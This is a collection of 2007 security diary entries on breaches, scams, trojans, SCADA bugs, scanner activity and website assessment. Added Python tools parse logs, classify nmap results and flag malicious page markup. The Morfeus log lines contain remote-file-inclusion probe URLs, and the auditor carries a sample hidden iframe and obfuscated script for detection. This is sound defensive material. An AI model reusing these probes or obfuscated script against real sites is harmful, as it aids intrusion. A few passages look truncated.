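        labels.append("root fetch with empty User-Agent")
    return labels


def analyze(log_text):
    """Return {source_ip: [(timestamp, label, request), ...]} for lines that match a rule."""
    hits = defaultdict(list)
    for line in log_text.strip().splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        for label in label_request(m["req"], m["ua"]):
            hits[m["ip"]].append((m["ts"], label, m["req"]))
    return dict(hits)


def timezone_offsets(log_text):
    """Distinct UTC offsets in order of first appearance; a change mid-log is the DST switch."""
    seen = []
    for line in log_text.strip().splitlines():
        m = LINE_RE.match(line)
        if m:
            offset = m["ts"].split()[1]
            if offset not in seen:
                seen.append(offset)
    return seen


if __name__ == "__main__":
    for ip, events in sorted(analyze(SAMPLE_LOG).items()):
        print(ip)
        for ts, label, req in events:
            print("   ", ts, label, "|", req)
    print("time zone offsets seen:", timezone_offsets(SAMPLE_LOG))
```

Feed it the real access_log instead of SAMPLE_LOG; the legitimate first visit with a proper User-Agent produces no hits, the Polish recon shows up only as empty-User-Agent root fetches, and the per-IP grouping makes the "scan Saturday, attack Sunday" pattern visible without reading every line.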




Published: 2007-03-24

A Possible Data Breach at Romanian Finance Ministry

An ISC reader shared with us a link to a story reported by a Romanian news agency that seems to describe a data breach at the Romanian Finance Ministry (thank you!). According to him, the article discusses a vulnerability on the website of Romania's National Agency for Fiscal Administration (the main unit of the Romanian Finance Ministry, equivalent of the IRS in the USA):
This vulnerability made available the full information about all of Romania's ~22 million citizens, including the Personal Number Code (CNP - "Cod Numeric Personal" - equivalent of the Social Security Number in the USA)
Even more, full identifying data of each tax payer is/was available. In addition to the CNP this also includes the full name, full address, and full financial information, including information about taxes and duties paid to the state budget.
This sounds like a very severe breach. Unfortunately, we don't have a way of verifying the person's description of the article, and we cannot translate the article's text ourselves. If you have additional information about the breach, the reliability of the news reporting agency, or are able to translate key sections of the article, please let us know.

The article's text is available at:

-- Lenny

Lenny Zeltser
InfoSec Practice Leader
Gemini Systems, LLC


Published: 2007-03-24

Vista's Windows Mail - program execution - CVE-2007-1658

There is public discussion about a vulnerability in Microsoft Windows Vista's Windows Mail. It centers around crafted URLs that are able to start programs if a similarly named directory exists as well. Claims are made this works against both local resources and UNC paths (e.g. \\server\share\path\file ) which are intrinsically remote.

CVE-2007-1658 was assigned to this issue.

We're still seeking further information and will keep tracking this with the other publicly known unpatched vulnerabilities in Microsoft products.

Swa Frantzen -- NET2S


Published: 2007-03-24

Domain Appraisal Scam Targets Domain Name Owners

The Internet abounds with scams of all shapes, colors, and flavors. This note is about a domain appraisal scam that seems to be targeting domain name owners. Justin Hall sent us an email describing the scam that targeted him recently. This note is based on his description of the scam, as well as on the accounts sprinkled throughout the web.

There are many accounts of this scam on the web. Although some details change from incident to incident, the key attributes, meant to confuse and misdirect the victim remain the same.

At the onset of the scam, the scammer emails the victim with an offer to purchase one of his or her domain names. According to one report, the note looks like this:
I found your name for sale on the web. Can you give me a price for the name in the subject line. Domain names is not my main business. Just another way to make money online on domain reselling.
The goal of the scam seems to be to direct the victim to appraise the domain name with an appraisal service of the  scammer's choice. However, rather than directly pointing the victim to a particular appraiser, the scammer directs the victim to a forum discussion about the most reliable appraisal service:
Of course, we must be sure that you are engaging a reputable appraisal company. I heard many appraisal companies often made inaccurate appraisals. I will only accept appraisals from independent sources I trust. I heard some appraisal companies often made inaccurate appraisals. To avoid mistakes I asked domain experts about reputable appraisal companies in a forum http://domaintalk.ourplace.com/Archive/261947.htm
All indications suggest that the forum discussion is bogus. The "forum" seems to be a static HTM page that is meant to look like a forum discussion. Discussions on real web forums about this scam indicate that there have been multiple versions of the bogus discussion, all hosted under http://domaintalk.ourplace.com/Archive, but using different file names.

Some of the bogus discussions are still available (95073.htm, 261947.htm, 98042.htm); others are no longer live. The discussions differ slightly, but all have the same pattern. The first message asks for a recommendation of a good domain appraisal service:
Hi folks, I am going to invest money in several good names. I don't want to overpay so third party valuation is a must. Investing in good names is a new business for me. Can someone recommend me good appraisers?
A user "NameSeller" responds by mentioning a few appraisal services. After a few other messages, the apparent winner usually becomes securenamesale.com.

Public accounts of the scam state that even if the victim pays for an appraisal certificate from the service approved by the scammer, the scammer does not purchase the domain.

Is securenamesale.com a legitimate service? It's hard to say for sure, but the victims describing the scam on public forums are highly doubtful. The site sells domain appraisal software for $99. We located another site hosted on the same IP address and having the same content as securenamesale.com; it goes under the name allfordomains.com.

The ultimate objective of the scammer remains a bit unclear. The scammer probably benefits financially from the victim using the designated domain appraisal service, although it's possible that some other motives exist. If you have any specific information about this scam, please let us know.

-- Lenny

Lenny Zeltser
InfoSec Practice Leader
Gemini Systems, LLC


Published: 2007-03-24

Tracking Publicly-Announced Data Breaches

Prioritizing IT spending is hard. Increasing awareness for IT security risks among executive managers is not any easier. Breach notification laws, which have recently been enacted by many states in the US, help on both accounts.

In a nutshell, the laws require companies that suffered a breach of sensitive customer information to notify the affected individuals. This is one of the reasons we have been hearing so many announcements of such incidents. It's not that data wasn't being compromised earlier; it's just that now there are legal obligations to make the breaches public.

Knowing the circumstances of publicly-announced breaches can help you identify and mitigate similar risks in your organization. An ISC reader wrote to us about one such situation, where he was asked to research incidents where a backup tape lost in transit resulted in a breach that led to identity fraud.

Although it's difficult to link breaches to confirmed cases of identity fraud--such details are rarely made public--here are a few ways you can keep track of announced data breaches.
  • Attrition.org maintains a Data Loss Archive and Database, which records many potential instances of data breaches. The information is available as an RSS feed and in a CSV file.
  • Privacy Rights Clearinghouse maintains a list of data breaches, sorted in chronological order for 2005, 2006 and 2007.
  • About.com compiled a list that includes a number of data breaches announced in 2006 and 2007.
If you would like to know which US states have enacted breach notification laws, take a look at the detailed list maintained by the University of Georgia; it was last updated on October 1, 2006. Another list, updated on January 9, 2007, is maintained by the National Conference of State Legislatures.

Here are a few more data points related to data breaches, which you may want to add to your arsenal:
  • According to the 2006 Annual Study: Cost of a Data Breach, conducted by The Ponemon Institute and sponsored by PGP Corporation and Vontu, the cost of responding to a data breach "averaged $182 per lost customer record." "The average total cost per reporting company was $4.8 million per breach and ranged from $226,000 to $22 million."
  • A study of announced data breaches, conducted by Phil Howard and Kris Erickson at the University of Washington, found that almost 1.8 billion records were compromised from year 2000 to 2006. A draft of the paper is available for download and includes lots of other interesting details.

-- Lenny

Lenny Zeltser
InfoSec Practice Leader
Gemini Systems, LLC


Published: 2007-03-23

Gozi Trojan Steals SSL Encrypted Data for Fun and Profit

A few days ago Secureworks had a good write-up on the Gozi trojan (thanks to ISC readers Bob and BB for pointing it out). This Russian malware beauty was doing the rounds and went undetected for some time. An estimate puts the black market value of the data stolen at $2 million. It spread through IE web browser exploits and was able to steal SSL-encrypted traffic using Winsock2. The days of the keylogger look to be over; the game got more interesting.

Basically, what this malware did was insert itself between Internet Explorer and the socket used to send data. It then stole the data prior to encryption and sent it to your happy local Russian hacker. While (I believe) this is the first really slick attempt to steal SSL data by inserting a listener to take the data pre-encryption, the technique is not new. In fact, I wrote about this same tactic almost two and a half years ago.

Encryption is meaningless if one of the endpoints of the communication is compromised. If you tunnel your transaction over SSL to a vendor who happily takes your data and sells it, the SSL won't help you. The same holds true for home PCs, which by any definition of security are completely untrustworthy. There are plenty of techniques to grab data before it is encrypted. The Neanderthal way is to use a keylogger. Now there are other techniques in use.

Until we find a way to get consumer PCs secure, or better yet, find a way for private financial data to be transmitted through a PC without the untrusted PC being able to compromise it, no electronic financial transaction will be secure. If the home PC isn't secure, all the encryption in the world won't help.

UPDATE: ISC Reader Nick suggests "Man at the Endpoint" as a name for this kind of attack.

John Bambenek / bambenek (at) gmail.com
University of Illinois at Urbana-Champaign


Published: 2007-03-23

The rise of the botnets

According to data from Shadowserver, the number of botnet-controlled machines has tripled in the last month. Specifically, the jump seemed to start on March 8th or so and has kept going ever since. For the most part, they haven't tracked a significant increase in the number of botnets (only about a 20% jump), just in the number of machines. The biggest C&C nets are near New York, Southern California, and Germany. The biggest concentrations of botnet-infected machines are in China, Brazil, and Argentina.

So it appears botnet controllers are getting better at increasing the size of their herds.

John Bambenek / bambenek /at/ gmail.com
University of Illinois at Urbana-Champaign


Published: 2007-03-23

New SCADA Vulnerabilities in OPC Servers

Last night, 6 e-mails hit the Bugtraq list detailing vulnerabilities in OPC (OLE for Process Control) servers made by Takebishi Electric (vuln 1, vuln 2, vuln 3, vuln 4, vuln 5) and NETxAUTOMATION (vuln 1). The CVE entries for these are CVE-2007-1319 (for Takebishi) and CVE-2007-1313 (for NETxAUTOMATION).

OPC servers are used in SCADA systems (power grid, water systems, etc.) to consolidate network device information. These vulnerabilities allow remote access to memory and could be used for remote code execution. Authentication would be bypassed and an attacker could potentially take complete control of the OPC server. Because of the kind of applications OPC servers are used in, this vulnerability is important to remediate.

In all 6 cases, the vendor has updates available for users to upgrade to. The vulnerabilities were found during an OPC server assessment by Neutralbit for one of their customers. At present, there is no known exploit code in the wild.

If you are running either of these two vendors' products in your environment, you should upgrade immediately.

John Bambenek  bambenek /at/ gmail.com
University of Illinois at Urbana-Champaign


Published: 2007-03-22

From the Mailbag

From the Mailbag:

New Trojan?

Kathy writes:
"We've been hit in a major way by some type of password stealing trojan which is similar to Backdoor.Berbew.N" She goes on to say "The symptoms are the same as what's reported for Expiro.a - it appears to infect about every EXE on the local and all network drives. We're pretty sure the infection vector is through Windows file shares but haven't confirmed that. An infected workstation tries to go to various Russian web sites"

Virustotal shows ...

Antivirus Version Update Result
AhnLab-V3 2007.3.23.0 03.22.2007 no virus found
AntiVir 03.22.2007 no virus found
Authentium 4.93.8 03.22.2007 no virus found
Avast 4.7.936.0 03.21.2007 no virus found
AVG 03.22.2007 no virus found
BitDefender 7.2 03.22.2007 no virus found
CAT-QuickHeal 9.00 03.21.2007 (Suspicious) - DNAScan
ClamAV devel-20070312 03.22.2007 no virus found
DrWeb 4.33 03.22.2007 no virus found
eSafe 03.22.2007 no virus found
eTrust-Vet 30.6.3501 03.22.2007 no virus found
Ewido 4.0 03.22.2007 no virus found
FileAdvisor 1 03.22.2007 no virus found
Fortinet 03.22.2007 suspicious
F-Prot 03.21.2007 no virus found
F-Secure 6.70.13030.0 03.22.2007 no virus found
Ikarus T3.1.1.3 03.22.2007 Trojan-Downloader.Win32.Small.AIP
Kaspersky 03.22.2007 no virus found
McAfee 4989 03.21.2007 no virus found
Microsoft 1.2306 03.22.2007 no virus found
NOD32v2 2136 03.22.2007 no virus found
Norman 5.80.02 03.22.2007 no virus found
Panda 03.22.2007 Suspicious file
Prevx1 V2 03.22.2007 no virus found
Sophos 4.15.0 03.13.2007 no virus found
Sunbelt 2.2.907.0 03.22.2007 no virus found
Symantec 10 03.22.2007 W32.Kakavex
TheHacker 03.22.2007 no virus found
UNA 1.83 03.16.2007 no virus found
VBA32 3.11.2 03.22.2007 suspected of Downloader.Small.21 (paranoid heuristics)
VirusBuster 4.3.7:9 03.22.2007 no virus found
Webwasher-Gateway 6.0.1 03.22.2007 Virus.Win32.FileInfector.gen (suspicious)

Traffic from Yahoo?

Kurt writes to tell us that "It appears the yahoo owned ip ranges are nailing several of our websites enough to take the machines down."

If anyone else is seeing heavy volume from Yahoo addresses, let us know and include packets if you can.


We've had several readers mention that Firefox is out. You can get your copy from all the usual sources.

Spam in Any Language ...

Duncan writes in to tell us of some spam he was able to block
"F-Secure published an update around 10:12 GMT this morning after we sent them a sample, and Sophos released an IDE update at 13:19 GMT. F-Secure called it Trojan-Spy:W32/Agent.QY, and Sophos called it Troj/BanSpy-C.

Looking at the virus tracking logs we maintain, the 'outbreak' was more of a small flurry, as the entries for our custom ClamAV rule stopped by noon GMT, and there have been no hits across the 150ish node network for the vendor-given names.

The only affected domains were in the Netherlands, and hosted on MXs with '.nl' as the TLD - so I'm guessing the code did a quick and dirty to see if the MX was in the Netherlands before sending the mail."

Handler Maarten Van Horenbeeck was able to read the spam and notes:

"...the e-mail pretends to be from ABN Amro, a large Dutch bank.

The message is completely in Dutch and tries to get the user to execute the attached file "ms_ssl3_upd.exe". This supposedly enables SSLv3 support, which 'will be required as of tomorrow' to access their e-banking site. The e-mail contains a number of typos, strange use of words and exclamation marks which makes it obvious to any reader who looks at it in detail that it is in fact a spoof.

ABN Amro has had a Dutch press release on their site regarding this e-mail since yesterday:

Thanks Maarten

Chris Carboni - HOD


Published: 2007-03-22

Quick intro to auditing web applications.

Last time I taught the web application security workshop, students asked for a brief guide to assessing their own web applications for common problems. So I sat down and wrote up a little paper outlining how I typically go about taking a quick look at a web application. Sadly, while this is a very quick and incomplete "audit", many web apps I am asked to look at fail it.

For the complete article see: www.sans.edu/resources/securitylab/audit_web_apps.php .
(While you are there... take a look at the Leadership and Security lab links at the top of the page for more articles)

And for all ISC/DShield users: I will be in San Diego in two weeks to teach the Linux/Apache/MySQL/PHP class. If you happen to be at SANS 2007, we will probably have a BoF session. Watch the announcements for details.


Published: 2007-03-21

Must be the month of the PHP bugs... and Morfeus is trying them out

So, I assume by now you all know it is the "Month of the PHP bugs" but besides the tons of PHP advisories what else have we been seeing?

Well, today fellow handler Jim Clausing started an interesting thread by posting his Apache logs, which contained lines upon lines of:

- - [21/Mar/2007:02:22:45 -0400] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= HTTP/1.1" 404 1042 "-" "Morfeus F*****g Scanner"
- - [21/Mar/2007:02:22:45 -0400] "GET /components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path= HTTP/1.1" 404 1042 "-" "Morfeus F*****g Scanner"

So, curious about Morfeus (which, incidentally, is an old tool) hitting my own systems, I went off to check my own logs:

tempest:~$ grep php www-access.log | grep Morfeus | cut -f 1 -d' ' | sort -n | uniq
tempest:~$ grep php www-access.log | grep Morfeus | wc -l

Aside from the scanning coming from a different host, it is pretty clear that Morfeus has been on my boxes too.

First observation: Morfeus doesn't care about what you might have set your Apache ServerTokens to (which is still a good trick against Netcraft abusers but not against script kiddies). Mine are set to give nothing away (and no, PHP is not installed) but they still scanned me.

Second observation: this is such a "noisy" scan that Jim said that he had turned off the Bleeding Edge Snort signatures and therefore only caught it when he got an alert from OSSEC (an open-source HIDS). It is never good news when signatures are turned off because they are too noisy but, at least in this case, I think we can safely assume that Jim noticed the scans the first time round.

Third observation: if you are running a site with PHP this is not an enjoyable month...


Published: 2007-03-20

Trust Relations, Defense in Depth, and Printers

Recently, I ended up doing a bit of consulting work for a couple of friends who work for a large-scale printing shop. These two techs are actually fairly security conscious and are moving toward a fairly good network/system architecture for a small business network. They take all the appropriate measures to keep the production servers away from the test and development systems and from the general workstations. So if you include the large-scale printing system as a separate entity and effectively another security realm, then we have four security realms. Within three of the four realms they have additional layers of security: a reasonably good patch management system, and personal firewalls and anti-virus products as appropriate. The shop is small enough that the staff have endured training on good passwords, on not opening unexpected attachments in e-mail, and on not visiting websites that are not business related. Because of all of their internal defenses, they rarely have any incidents. Even their broadband DSL provider does some amount of filtering for this mom-and-pop business as part of the business agreement, which in reality probably amounts to filtering the NetBIOS ports, SQL Server and a few other wide-scale attack vectors.

However, despite the best efforts of the IT staff (all two of them), they had an odd incident. They were contacted last week via the postmaster@ address and told that their mail server was compromised and spewing spam. They went to their mail server, looked at its logs and couldn't see anything amiss with the system. Through a bit of correspondence, they received a copy of the original spam e-mail with full headers. It turned out that the test mail server, not the production server, was the one acting as the relay. However, the test server was configured to only accept mail from local systems while testing. They had even configured their little SonicWall firewall to ensure that no one outside of their business could so much as start a connection to that system. The test server was, however, allowed to start connections itself. Looking closely at the logs on the test system, they identified that their black box of a printing press was the system spewing the spam. Confused at what was going on, they contacted me.

It turns out that despite their defense-in-depth mentality, it all came crumbling down because of a single system. When they purchased this brand new, state-of-the-art digital printing press, it came with a Unix-based computer that acts as print queue repository, controller, web server, and countless other nifty features to make their life easier and better. However, as you can see below, the Unix system has many services installed and operational. And the company that supports this printing press had requested Internet access to the system should a problem arise and the small business call in for support.

To the best of my ability to look into the compromised system, it appears that it was compromised through either an SSH or a web server vulnerability (both logs had been purged, so I have a "chicken or the egg" problem). Once in, the attacker turned around and added some software to the web server directory to help keep remote access to the system, and appears to have probed the local network to identify local mail servers. It found both the production server and the test server and used both of them to spew the junk mail. Thankfully, the production mail server had anti-spam software installed on it which deleted the vast majority of the mail sent through that system (too bad for the spammer :-) )

As for lessons learned: the company is actually pretty good in its security mindset. However, one system could potentially have blown the overall security posture of all of the other security realms in their organization, because of the trust relations. The manufacturer of the printing device should be chastised for making a system that has so many services enabled without documentation on what needs to be enabled for which types of activities. For those who think you can figure all of that out without proper documentation, please see the results of the nmap scan and you will see why I think it is a little more difficult than a deny-all policy with ports added back one at a time.

(The 65479 ports scanned but not shown below are in state: closed)
21/tcp open ftp?
22/tcp open ssh SunSSH 1.1 (protocol 2.0)
80/tcp open http Apache httpd
111/tcp open rpcbind 2-4 (rpc #100000)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
515/tcp open printer
609/tcp open rpc.unknown
614/tcp open ndbserver58 1 (rpc #536871002)
631/tcp open http Apache Tomcat/Coyote JSP engine 1.1
1234/tcp open hotline?
2020/tcp open xinupageserver?
2049/tcp open nfs 2-4 (rpc #100003)
2346/tcp open unknown
4045/tcp open nlockmgr 1-4 (rpc #100021)
4321/tcp open rwhois?
6000/tcp open X11 (access denied)
6080/tcp open tcpwrapped
7100/tcp open font-service Sun Solaris fs.auto
8009/tcp open ajp13?
8080/tcp open http Apache httpd 1.3.31 ((Unix))
9021/tcp open unknown
32771/tcp open status 1 (rpc #100024)
32772/tcp open fmproduct 1 (rpc #1073741824)
32773/tcp open metad 1-2 (rpc #100229)
32774/tcp open mdcommd 1 (rpc #100422)
32775/tcp open rpc.metamedd 1 (rpc #100242)
32776/tcp open metamhd 1 (rpc #100230)
32777/tcp open mountd 1-3 (rpc #100005)
32784/tcp open rpc
32785/tcp open dtcm 5 (rpc #1289637086)
32808/tcp open rpc
32811/tcp open rpc
44492/tcp open rpc.unknown
44493/tcp open unknown
44504/tcp open unknown
44505/tcp open rpc.unknown
44515/tcp open rpc.unknown
44516/tcp open rpc.unknown
44517/tcp open ndbserver67 1 (rpc #536871011)
44520/tcp open unknown
44523/tcp open rpc
44528/tcp open rpc.unknown
44536/tcp open unknown
44537/tcp open unknown
44538/tcp open unknown
44539/tcp open unknown
44540/tcp open unknown
44541/tcp open unknown
44542/tcp open unknown
44558/tcp open rpc.unknown
44559/tcp open rpc.unknown
44586/tcp open rpc.unknown
44744/tcp open rpc.unknown
45693/tcp open rpc.unknown
46380/tcp open rpc.unknown
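To make the "deny all, then add back" argument concrete, here is an added example (not the diary author's code) that parses the nmap output above and sorts the open ports into documented, RPC-based and undocumented buckets; DOCUMENTED_PORTS is a hypothetical allow-list standing in for the vendor documentation the entry says was missing.

```python
"""Sort the printer controller's open ports into an allow-list review.

Added example, not the diary author's code. SAMPLE_SCAN copies a subset of
the nmap output above; DOCUMENTED_PORTS is a hypothetical allow-list that
stands in for the vendor documentation the entry says was missing.
"""
import re

# One "PORT/PROTO STATE SERVICE [VERSION]" line of nmap's normal output.
NMAP_LINE_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.+))?$"
)
# nmap marks Sun RPC services with "(rpc #PROGRAM)" in the version column,
# or with a bare "rpc" / "rpc.unknown" service name when it cannot do better.
RPC_RE = re.compile(r"\(rpc #\d+\)|^rpc(?:\.|$)")
# Solaris rpcbind hands anonymous RPC services ports from 32768 upward at
# boot, so a port-number rule written today may not match after a reboot.
DYNAMIC_RPC_FLOOR = 32768

# Hypothetical: what the vendor's paperwork ought to say the press needs.
DOCUMENTED_PORTS = {22: "ssh for vendor remote support", 80: "web console", 515: "lpd print queue"}

SAMPLE_SCAN = """\
(The 65479 ports scanned but not shown below are in state: closed)
21/tcp open ftp?
22/tcp open ssh SunSSH 1.1 (protocol 2.0)
80/tcp open http Apache httpd
111/tcp open rpcbind 2-4 (rpc #100000)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
515/tcp open printer
631/tcp open http Apache Tomcat/Coyote JSP engine 1.1
2049/tcp open nfs 2-4 (rpc #100003)
6000/tcp open X11 (access denied)
8080/tcp open http Apache httpd 1.3.31 ((Unix))
32771/tcp open status 1 (rpc #100024)
32777/tcp open mountd 1-3 (rpc #100005)
44492/tcp open rpc.unknown
44493/tcp open unknown
"""


def parse_nmap(text):
    """Return one dict per port line; headers and blank lines are skipped."""
    ports = []
    for line in text.splitlines():
        m = NMAP_LINE_RE.match(line.strip())
        if not m:
            continue
        entry = m.groupdict()
        entry["port"] = int(entry["port"])
        entry["version"] = entry["version"] or ""
        ports.append(entry)
    return ports


def is_rpc(entry):
    """True when nmap identified the listener as a Sun RPC service."""
    return bool(RPC_RE.search(entry["version"]) or RPC_RE.match(entry["service"]))


def classify_ports(ports, documented):
    """Bucket open ports: documented, RPC (with the dynamically numbered
    subset called out separately) and everything else, which is what a
    deny-all policy would silently break."""
    report = {"documented": [], "rpc": [], "dynamic_rpc": [], "undocumented": []}
    for p in ports:
        if p["state"] != "open":
            continue
        if p["port"] in documented:
            report["documented"].append(p)
        elif is_rpc(p):
            report["rpc"].append(p)
            if p["port"] >= DYNAMIC_RPC_FLOOR:
                report["dynamic_rpc"].append(p)
        else:
            report["undocumented"].append(p)
    return report


if __name__ == "__main__":
    report = classify_ports(parse_nmap(SAMPLE_SCAN), DOCUMENTED_PORTS)
    for bucket, entries in report.items():
        print(f"{bucket}: {[e['port'] for e in entries]}")
```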


Published: 2007-03-19

Some chatter on information security

Small talk we picked up today:

  • ENISA has released a new analysis of emerging risks in information security. While some of the scenarios are a bit science-fiction like, the interesting thing about this document is that, unlike many vendor reports that cover the past year or so, it looks at where IT is going in the future and then tries to pinpoint viable threat agents.
  • Experts from countries belonging to the Shanghai Cooperation Organization (the other SCO) are meeting to discuss information security from March 19th to 23rd in Beijing. We for one are very interested in this evolution, as contacting incident response teams in the affected countries (China, Kazakhstan, Kyrgyzstan, Russia, Tajikistan and Uzbekistan) to respond to incidents often proves difficult.
  • An anonymous reader wrote in that the PF_RING kernel patch, used for fast packet capturing on Linux, now supports Bloom filters. Luca Deri, the PF_RING author, describes some of the performance advantages here.


Published: 2007-03-19

Assessing websites for malicious content

If you are responsible for information security within your organization, part of your job probably consists of reviewing sites that have been submitted by your users: perhaps in response to a request to allow access to the site through a URL filtering application, to review whether a site may have contributed to a virus outbreak, or to review your own corporate website. Last week, Michael wrote in wondering what the best approach is to do these types of review.

The fact is that you can make this process as heavy as you wish, depending on the importance of the site to your organization and the risk/impact of allowing access to it. Each review, however, should start with an off-line component, that is, without accessing the site itself, followed by an on-line component, which entails a connection. The first is important to assess what the site could logically be expected to do, the latter to see how it makes your end users' systems behave.

As part of an off-line review:

  • Verify the whois information. The corporate website of a bank is not often registered yesterday. A US bank is also not often registered by a contact in Nigeria. Some of the information can be checked for validity, such as zip codes and telephone numbers.
  • There are on-line tools that can help you assess the site. McAfee's SiteAdvisor for example allows you to submit sites for review. If the site has already been submitted before, it gives you information on downloadable executables, a history of spam after registering on the site, as well as information on outbound links and usage of cookies.
  • Web blocklists such as malware.com.br provide realtime HTTP blocklists. You can download the existing blocklist and match domains with it, or submit a new URL and have it tested.

If these do not turn up anything unusual, it's time to make a connection to the site:

  • In order to have the most objective view of what the site is doing, I download the site using the common wget tool. Use of the -p option will download all files that are necessary for a browser to interpret it (such as inline images and stylesheets); these can then be scanned manually for malicious script tags as well as through any AV solution. Smart use of -r and -l will make the tool download the site to the depth that you require it to be analyzed. Keep in mind that these may pose undue stress on the web server, especially if pages are dynamically generated, so be gentle. A good alternative is curl. As some sites base their response on the type of browser connecting, you can imitate specific ones by using the --header option.
    When you're dealing with new malware, an AV solution that has good heuristics detection can prove valuable. Back in the '90s, one specific solution, no longer on the market, reported in great detail on what an executable was up to - did it become memory resident (the good old DOS TSR code), did it scan the disk for other executables, did the extension not match with the code. Something to that degree is difficult to find, but excellent for this purpose.
  • Connecting through a proxy can pre-empt execution of the more obvious threats and help in identifying malicious or potentially dangerous links. Two weeks ago we covered SpyBye, a proxy tool specifically written for this purpose.
  • If this does not turn up anything malicious, I generally use a virtual machine such as VMware, with a browser installation very similar to that on the corporate desktops. In addition, the box is running at least regshot, filemon and tcpview to assess for any strange activity taking place upon connecting to the site. I also run a sniffer to see whether any strange traffic is originating from or being generated towards the virtual machine. Additional toolbars such as the Firefox web developer toolbar allow you to see much more information than you usually would (CSS, ...).

Especially in the case of targeted malware, using a sacrificial-lamb machine on dialup, using even different DNS servers, might be worthwhile. However, if your organisation is the only one targeted, it might also reveal you are investigating the matter. This is an obvious tradeoff. Also note that even simple tools you use during the investigation can have vulnerabilities, such as wget.
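As an added example of the off-line scanning step (not code from the original entry), the following script walks a page saved with wget -p and flags the constructs a reviewer would look at first: scripts loaded from foreign hosts, zero-size frames, obfuscation primitives and long escaped blobs. The heuristics, host names and the sample page are constructed for the example.

```python
"""Static triage of a page fetched off-line (wget -p) before it is opened
in any browser.

Added example, not from the original diary entry. The heuristics below are
a starting point rather than a detection product, and the sample page, its
host names and the encoded string are constructed for the example.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Primitives that legitimate pages rarely need but drive-by loaders lean on.
OBFUSCATION_RE = re.compile(
    r"\b(eval|unescape|document\.write|String\.fromCharCode)\s*\(", re.IGNORECASE
)
# Long runs of %XX or \xXX escapes: content hidden from a casual reader.
ESCAPED_BLOB_RE = re.compile(r"(?:%[0-9a-f]{2}){8,}|(?:\\x[0-9a-f]{2}){8,}", re.IGNORECASE)


def _is_hidden(attrs):
    """Frame that renders invisibly: 0/1 pixel box or hidden via inline style."""
    def tiny(value):
        try:
            return int(str(value).lower().rstrip("px").strip()) <= 1
        except ValueError:
            return False
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return (tiny(attrs.get("width")) and tiny(attrs.get("height"))) \
        or "display:none" in style or "visibility:hidden" in style


class PageAuditor(HTMLParser):
    """Collects (kind, detail) findings while the page is parsed."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []
        self._script = None  # buffer while inside <script>...</script>

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._script = []
            src = a.get("src") or ""
            host = urlsplit(src).hostname
            if host and host.lower() != self.page_host:
                self.findings.append(("external-script", src))
        elif tag in ("iframe", "frame") and _is_hidden(a):
            self.findings.append(("hidden-frame", a.get("src") or ""))
        elif tag in ("object", "embed"):
            self.findings.append(("active-content", a.get("data") or a.get("src") or ""))
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            self.findings.append(("meta-refresh", a.get("content") or ""))

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            self._inspect_script("".join(self._script))
            self._script = None

    def _inspect_script(self, code):
        m = OBFUSCATION_RE.search(code)
        if m:
            self.findings.append(("obfuscation-primitive", m.group(1)))
        if ESCAPED_BLOB_RE.search(code):
            self.findings.append(("escaped-blob", f"{len(code)} chars of script"))


def audit_page(html_text, page_url):
    """Return the list of (kind, detail) findings for a saved page."""
    auditor = PageAuditor(urlsplit(page_url).hostname or "")
    auditor.feed(html_text)
    auditor.close()
    return auditor.findings


# Constructed sample: a benign-looking page carrying the classic tell-tales.
SAMPLE_PAGE = """<html><head><title>Welcome</title>
<script src="/js/menu.js"></script>
<script src="http://cdn.example.invalid/ads.js"></script>
</head><body>
<h1>Quarterly report</h1>
<iframe src="http://203.0.113.5/in.cgi?3" width="0" height="0"></iframe>
<script>var s="%41%42%43%44%45%46%47%48%49";document.write(unescape(s));</script>
<img src="/logo.png">
</body></html>"""


if __name__ == "__main__":
    for kind, detail in audit_page(SAMPLE_PAGE, "http://www.example.invalid/index.html"):
        print(f"{kind:22} {detail}")
```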

This overview merely covers the basics of how to assess a site. It doesn't go into detail on assessing the actual malicious code, should you find any. Other diary entries have covered this in more depth here and here.

No doubt you have many other great ideas on how to approach this issue. Do you know of good browser plugins, proxies, websites and other tools fit for this purpose? Let us know.

v2: Thanks to Swa for his feedback and suggestions.


Published: 2007-03-18

IE adoption rate

If you have read our diary articles for a while, you have surely seen regular entries encouraging you to use browsers other than IE. Now, we all expect security-minded people to make other choices in what browser they use compared to the general public visiting non-technical web sites.

So do security-minded people actually choose other browsers compared to the general population(*)?

[Chart: IE adoption]

This chart looks at two populations and measures how many visitors use a version of IE to visit that web site. As expected, the percentage of visitors using a version of IE on a security-related web site is significantly lower than on generic web sites.

It's interesting to note that
  • Firefox versions are about as popular in the security minded population as IE versions.
  • These values hardly changed at all over the past 12 months; there's a very slight downward trend, but it's so small that it would need serious thought from a statistical perspective before drawing any conclusions (graph not shown).

I've been looking at the evolution in IE 7's adoption since it got released and subsequently put on automatic updates with great anticipation as it would allow me to stop supporting IE 6's bugs when dealing with CSS.

[Chart: IE adoption]

This graph lists the percentage of IE-using visitors that have upgraded to IE version 7. The blue graph is for the security-minded population and the red graph is for the generic population(*).

Security-minded visitors seem to have upgraded their browsers long before the release of IE 7, and had a head start in adoption rates. Both populations seem to have slowed their adoption of IE 7 in the last months. Security-minded users seem to be at risk of losing their adoption-rate head start.

(*) Data collected on web sites where I have access to the Google Analytics statistics, so the accuracy of browser identification is the same as for Google Analytics. Due to this, this data completely ignores people who have blocked JavaScript by default (e.g. by using Firefox and NoScript).
Data used to write this report contained no personally identifiable information and was collected using this website for the security-minded population and from a travel website for the general population.

Swa Frantzen -- NET2S


Published: 2007-03-17

IE7 - XSS against local resource - CVE-2007-1499

